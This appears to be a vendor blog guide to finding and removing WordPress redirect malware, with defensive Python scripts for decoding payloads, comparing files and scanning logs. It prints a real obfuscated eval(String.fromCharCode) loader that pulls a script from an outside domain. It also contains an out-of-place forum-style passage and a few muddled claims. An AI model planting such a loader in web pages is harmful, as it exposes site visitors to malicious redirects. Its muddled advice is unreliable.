WordPress Website Hacked Redirect? Website Redirect to Malicious Domain

Does your WordPress website forward users to unknown and unsecured websites? If so, your website may be hacked. These WordPress redirect hacks are common: the malware redirects visitors to spammy websites, phishing pages or attacker-controlled domains. We recently noticed cases where wp-admin itself is redirected to spammy ads and counterfeit CAPTCHA pages. Attackers achieve this through various means and infection sources. In this article, we look at the causes of the WordPress redirect hack, explain its consequences and walk through the complete removal process.

What is WordPress Redirect Hack?

A WordPress malware redirect hack is a common type of attack, which redirects visitors to phishing sites or malicious websites automatically.

A WordPress redirect hack can have serious consequences:

  • It can tarnish your brand image and your reputation as a company.
  • It can cause a huge loss of traffic, because your hard-earned visitors are redirected elsewhere.
  • Less traffic, in turn, can lead to lower sales, which affects the company.
  • The websites your visitors are sent to may promote illegal goods, which could drag your website into legal trouble.

Continue reading this article to learn how to remove malware from WordPress and get your website out of this situation.

Step by Step Guide to Fix Hacked Website Redirect

  • Back up the site files and the database

Tools are available online to compare files and determine which code in them is new. You can also ask your hosting provider for backup copies; some hosting companies take backups by default.

  • Check for redirection from different IP addresses and devices

Sometimes attackers infect a website in a tricky way, so that it redirects only when it is accessed from a particular IP region. In those cases, the issue is not easy to detect.

Most commonly infected files and plugins

  • .htaccess and wp-config.php are the files most often targeted
  • Outdated WordPress plugins are another common problem
  • Theme files (footer.php, header.php, functions.php and index.php)
  • Check all recent modifications, and also check recently installed plugins.

Deleting malware with scanning

  • Scan the complete domain and analyze changes to core files
  • Look through the source code for malware scripts
  • Look for changes in your database, such as the siteurl or home option in the wp_options table

Implement Security & Firewall

  • Change the passwords for:
    1. CMS admin
    2. Database user account
    3. Hosting account
  • Use an advanced WAF (Web Application Firewall) to boost your security

WordPress Hacked Redirect: How Was Your Website Infected?

Attackers use various methods to redirect users. Some of them are:

  • Redirecting users via malicious code.
  • Executing .php code.
  • Adding themselves as a ghost admin on your website.

By adding code to the .htaccess / wp-config.php files

In many cases we have seen attackers hide malicious code or files in the .htaccess file. Sometimes this code looks exactly like legitimate code, which makes it harder to identify and delete. Besides .htaccess, the code may also be hidden in other key WordPress files, such as wp-config.php, wp-vcd, etc., to name a few.

The following picture shows the hidden code found by our experts on one of our customers' sites.

[Image: eval]

Users also ran into a particular situation when using Internet Explorer. There, the malware took users to websites that pushed fake Java and Flash updates. The link led to adobe flash player-31254524.exe being downloaded, a file that several security services have reported as malware.

By adding themselves as a ghost admin

Once attackers gain access to your website, they can add themselves as an admin on the site. Now that they possess the site's full power, they redirect it to other illegal, obscene or unverified domains.

How to remove eval(String.fromCharCode(118, 97, 114, 32 WordPress hacking code?

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 32, 115, 115, 99, 114, 105, 112, 116, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 32, 115, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 106, 115, 111, 110, 46, 115, 116, 114, 105, 110, 103, 101, 110, 103, 105, 110, 101, 115, 46, 99, 111, 109, 47, 106, 115, 111, 110, 46, 106, 115, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 115, 99, 114, 105, 112, 116, 41, 59, 10))</script>

1) Old theme code (will be updated but requires weeks), protected by firewall
2) Code injected in the database that may cause malware spreading

As for number 2, I have performed scans with many plugins, and apparently there are no threats. I have also dumped the DB but I have no idea what to look for.
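One thing to look for in a database dump or in theme files is the String.fromCharCode pattern shown above. The following added example (not part of the original post) decodes such payloads as plain text, without executing them, and reports which remote script they load; the sample dump, the example.invalid host and the function names are constructed for illustration.

```python
import re

# String.fromCharCode(<comma-separated decimal codes>), wherever it appears.
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")
# Remote script URLs assigned to a .src property in the decoded JavaScript.
SRC_RE = re.compile(r"""\.src\s*=\s*["'](https?://[^"']+)["']""")


def decode_charcode_payloads(text):
    """Decode each String.fromCharCode(...) call as text; nothing is executed."""
    decoded = []
    for match in CHARCODE_RE.finditer(text):
        codes = [int(n) for n in match.group(1).split(",")]
        if all(code < 0x110000 for code in codes):
            decoded.append("".join(chr(code) for code in codes))
    return decoded


def scan_dump(dump):
    """Return (line number, script URLs, decoded JS) for every payload found."""
    hits = []
    for lineno, line in enumerate(dump.splitlines(), 1):
        for js in decode_charcode_payloads(line):
            hits.append((lineno, SRC_RE.findall(js), js))
    return hits


def to_charcodes(js):
    """Helper used only to build the constructed sample below."""
    return ", ".join(str(ord(ch)) for ch in js)


# Constructed sample: two rows of a SQL dump, one carrying an injected loader
# that points at a placeholder host (example.invalid).
SAMPLE_JS = ('var s = document.createElement("script"); '
             's.src = "https://cdn.example.invalid/x.js"; '
             'document.head.appendChild(s);')
SAMPLE_DUMP = (
    "INSERT INTO `wp_posts` VALUES (12,'Hello','<p>Welcome</p>"
    "<script language=javascript>eval(String.fromCharCode("
    + to_charcodes(SAMPLE_JS) + "))</script>');\n"
    "INSERT INTO `wp_posts` VALUES (13,'About','<p>Nothing to see</p>');\n"
)

if __name__ == "__main__":
    for lineno, urls, js in scan_dump(SAMPLE_DUMP):
        print(f"dump line {lineno}: loads {urls}")
        print(f"  decoded: {js}")
```

The reported line numbers point at the rows (or files) that need cleaning, and the decoded URL can be searched for across the rest of the site.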

Where is the Redirect Infection for WordPress?

Attackers can infect the site by injecting code into any of the key WordPress files. Check the following files for malicious code:

  • index.php
  • index.html
  • .htaccess file
  • Theme files
    1. footer.php
    2. header.php
    3. functions.php

Scanning for WordPress malware redirection:

The first step toward deleting the malware is locating it. Attackers may have infected several areas, and identifying them will help you get rid of the infection.

Scan Core Files

The core WordPress files determine the appearance and functionality of the WordPress software. Identifying changes in the core files will help you trace an attack: when you analyze the code in these files, any unknown change you find points to the source of the attack. However, if your website has malware, this process will not reveal anything. You therefore need to carry out authenticity checks periodically.

  • In addition, the Google Diagnostic Page is a tool that can help you determine which part of your website contains the infection. It also indicates the number of infected files and directories.
  • The code is mostly hidden in a few core WordPress files. Some of the infection areas are index.php, index.html, theme files, etc.
  • Malicious code injected into the site's header.php file was one of the most common instances of this WordPress redirect hack. The code looks like a bunch of meaningless characters; however, it redirects users to the default website and sets a one-year cookie.
  • Known malicious code can also be found by searching for keywords such as 'eval' or 'base64_decode'. While most malicious code contains these keywords, not every piece of code that contains them is malicious. Users often delete good code that they suspect of being bad.
  • In another case of a hacked WordPress site, the attackers injected JavaScript code into all files with the .js extension. The previous version of the code infected only the jquery.js files. In all cases, the code was part of legitimate files, which made detection difficult.

Scan WP Admin

Another way attackers infect a site is by adding themselves as a ghost admin on your website. Go to WP admin and check the user list against the users you know to be authentic. If your website has memberships, it can be a little difficult to go through all the users. However, a website with only a few users is easily scanned for suspect users. Once you find the ghost users, you can simply remove them from the list.

Scan Plugins & Themes

  • Unverified or unknown plugins can also infect your site. By going to WP admin and then clicking on 'Plugins', you can view the entire list of plugins. If you detect any unidentified or suspect plugins, remove them.
  • You must also compare your plugin files manually with the original ones and detect any anomalies. You can download the same plugins from the WordPress plugin repository and match your installed plugins against them. This has its limitations, however, since no plugins are updated in the repository when a new version is pushed out.
  • There is always a chance that your theme files are infected. It is therefore better to scan your theme files manually instead of relying on free security services. Using a comparison tool, you can compare your installed files with the original ones. If you find differences, find out why and how they came about.
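The comparison against original files described above, for core, plugin and theme files alike, can be scripted. This added example (not the article's own tooling) hashes an installed directory and a clean copy of the same version and lists modified, added and missing files; the demo tree and its file contents are constructed, and obtaining the clean copy is assumed.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_tree(root):
    """Map each file's path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def compare_to_reference(installed, reference):
    """Classify installed files against a clean copy of the same version."""
    live, clean = sha256_tree(installed), sha256_tree(reference)
    return {
        "modified": sorted(f for f in live if f in clean and live[f] != clean[f]),
        "added": sorted(f for f in live if f not in clean),
        "missing": sorted(f for f in clean if f not in live),
    }


def build_demo(base):
    """Constructed sample: a clean theme copy and an installed copy with changes."""
    clean, live = Path(base, "clean"), Path(base, "live")
    files = {"header.php": "<?php wp_head(); ?>\n", "footer.php": "<?php wp_footer(); ?>\n",
             "functions.php": "<?php // theme setup\n"}
    for root in (clean, live):
        (root / "inc").mkdir(parents=True)
        for name, body in files.items():
            (root / name).write_text(body)
    # Differences a scan should surface: an edited file, an extra file, a deleted file.
    (live / "header.php").write_text(
        files["header.php"] + "<?php /* appended by unknown party */ ?>\n")
    (live / "inc" / "cache.php").write_text("<?php // not shipped with the theme\n")
    (live / "footer.php").unlink()
    return live, clean


def run_demo():
    with tempfile.TemporaryDirectory() as base:
        return compare_to_reference(*build_demo(base))


if __name__ == "__main__":
    for status, names in run_demo().items():
        print(status, names)
```

For core files, WP-CLI's `wp core verify-checksums` performs the same kind of comparison against the checksums published for your WordPress version.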

WordPress Redirect Hacked: How Do You Clean Up Your Website?

Now that the scan is done, let's move on to the process of malware removal. You have probably found the changes or malware by now. If not, read on.

Manual Cleanup of Malware

  • The first step is to review the logs on your server, where you will find clues to any infection that has crept in. You can also check for unknown IP addresses that may have injected malicious code into your website. Any unknown POST requests should be investigated too: these requests send data to your site and may have delivered the malware that causes the WordPress redirect hack. Remove what they injected promptly.
  • You can also run commands on your server to find out where your website has been compromised, then remove the malicious code manually to recover your website. Useful commands include grep and find, which work via an SSH client.
  • Go to the infected files and clean them from the back end. Restore the configuration to its original settings. Once that is done, it is time to plug the hole: update your plugins and themes, because these are the most common infection points.
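The log review in the first step can be narrowed down with a short script. This added example (not from the original article) parses access-log lines in Combined Log Format and lists successful POST requests from unknown IP addresses with a reason for each; the log lines are constructed, and KNOWN_IPS and EXPECTED_POST are assumptions to adapt to your own site.

```python
import re
from collections import defaultdict

# Combined Log Format: ip, two identity fields, [time], "METHOD path proto", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Assumptions for a hypothetical site: the admin's address and normal POST endpoints.
KNOWN_IPS = {"198.51.100.7"}
EXPECTED_POST = {"/wp-login.php", "/wp-comments-post.php",
                 "/wp-admin/admin-ajax.php", "/wp-cron.php"}


def classify(path):
    """Return a reason if a POST to this path deserves a look, else None."""
    if path.startswith("/wp-content/uploads/") and path.endswith(".php"):
        return "PHP script inside uploads"
    if path in EXPECTED_POST:
        return None
    if path.startswith("/wp-admin/"):
        return "admin action from unknown IP"
    return "unexpected POST target"


def unknown_posts(lines, known_ips=KNOWN_IPS):
    """Group successful (2xx/3xx) POSTs from unknown IPs, with a reason for each."""
    findings = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if (not m or m["method"] != "POST" or m["ip"] in known_ips
                or m["status"][0] not in "23"):
            continue
        path = m["path"].split("?", 1)[0]  # ignore the query string
        reason = classify(path)
        if reason:
            findings[m["ip"]].append((m["time"], path, reason))
    return dict(findings)


# Constructed access-log lines using documentation IP ranges, not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:09:12:01 +0000] "POST /wp-admin/post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.50 - - [10/Mar/2024:09:14:33 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.50 - - [10/Mar/2024:09:15:02 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Mar/2024:09:20:47 +0000] "POST /wp-content/uploads/2024/03/img.php?x=1 HTTP/1.1" 200 17 "-" "curl/8.0"
192.0.2.90 - - [10/Mar/2024:09:30:00 +0000] "POST /xmlrpc.php HTTP/1.1" 403 0 "-" "bot"
""".splitlines()

if __name__ == "__main__":
    print(unknown_posts(SAMPLE_LOG))
```

The timestamps of the flagged requests give a window for checking which files were modified around the same time.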

WordPress Hacked Redirect:

You need to update your secret keys and passwords after the cleanup steps to protect your website. You may also need to reinstall all free and premium plugins to ensure a fresh configuration.

Using the Google Webmaster tool is a good next step. This free tool lets you better manage a lot of information about your website, and unknown malware can also be submitted for evaluation. Once the website is cleaned, submit it for review together with all the steps you have taken to remove the malware. You can do so as follows:

  • Log in to the Google Search Console
  • Verify your ownership of the website
  • Go to Site, then click on the Dashboard option
  • Select the Security Issue

In most cases, the infection is in the website's header.php file. This only happens if the attacker has access to the WordPress admin interface and can change the theme's files from there. By disabling the ability to edit PHP files via wp-admin, you can prevent such attacks. To make this change, add the following line to the wp-config.php file:

define('DISALLOW_FILE_EDIT', true);

This protects your website from WordPress redirect hacks by preventing such interference with its files.

WordPress Malicious Redirects: Conclusion

Once you have finished cleaning up your website, you are ready to put it online again. Test the functioning of your website before doing so and make sure there are no defects. You will also need to strengthen the security of your website. A premium website security service such as Astra is among the best options. They will ensure that your website is safe and secure against any hacked WordPress redirects. In addition to its firewall and VAPT (Vulnerability Assessment & Penetration Testing), Astra offers the following features: remote malware scanning, file injection protection, spam login protection. You can breathe easily with their latest and comprehensive tools.

I also suggest that you follow this video step by step to secure your WordPress site.
